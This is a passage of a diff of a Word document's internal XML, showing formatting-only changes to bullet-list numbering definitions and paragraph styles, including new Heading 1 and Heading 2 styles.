         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="EA404A20">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1414,10 +882,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="142A0902">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1426,10 +894,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="E80CC6B4">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1438,10 +906,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="6F0EFA5E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1450,10 +918,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="7D3A8CF0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1462,14 +930,15 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="2">
-    <w:nsid w:val="4fc82258"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4FC82258"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3CB2C8B6"/>
+    <w:lvl w:ilvl="0" w:tplc="65E0B082">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1478,10 +947,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="E196F04C">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1490,10 +959,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="587CF318">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1502,10 +971,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="603EADC0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1514,10 +983,10 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="2EC4769A">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1526,10 +995,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="642C4BD6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1538,10 +1007,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="C3588C4E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1550,10 +1019,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="037863F6">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1562,10 +1031,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="3F5C182E">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1574,14 +1043,15 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="1">
-    <w:nsid w:val="34df7af4"/>
-    <w:multiLevelType xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:val="hybridMultilevel"/>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7622A07E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9E967DBE"/>
+    <w:lvl w:ilvl="0" w:tplc="3FEC95A0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1590,10 +1060,10 @@
         <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="1">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="B6E02CB8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1602,10 +1072,10 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="2">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="E83E12D8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1614,10 +1084,10 @@
         <w:ind w:left="2160" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="3">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="6CEC27AE">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1626,10 +1096,10 @@
         <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="4">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="91700B04">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1638,10 +1108,10 @@
         <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="5">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="F1D8AAA8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1650,10 +1120,10 @@
         <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="6">
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="94FE51D8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1662,10 +1132,10 @@
         <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="7">
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="5DF27CE8">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -1674,10 +1144,10 @@
         <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:ilvl="8">
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4ACE361A">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -1686,37 +1156,37 @@
         <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
-        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="6"/>
+  <w:num w:numId="1" w16cid:durableId="1258951248">
+    <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="5">
+  <w:num w:numId="2" w16cid:durableId="868687693">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1320962718">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="4" w16cid:durableId="662515078">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="5" w16cid:durableId="559363111">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="3"/>
-  </w:num>
-  <w:num w:numId="2">
+  <w:num w:numId="6" w16cid:durableId="486895140">
     <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="1">
-    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" mc:Ignorable="w14 w15 wp14 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
         <w:sz w:val="22"/>
         <w:szCs w:val="22"/>
         <w:lang w:val="it-IT" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -1728,17 +1198,17 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="371">
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
     <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
     <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1748,22 +1218,22 @@
     <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1794,7 +1264,7 @@
     <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
     <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1994,8 +1464,8 @@
     <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
     <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
     <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:uiPriority="37" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
     <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
     <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
     <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
@@ -2100,18 +1570,64 @@
     <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
     <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
     <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
-  <w:style w:type="paragraph" w:styleId="Normal" w:default="1">
+  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
-  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
+  <w:style w:type="paragraph" w:styleId="Heading1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Heading2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="Heading2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
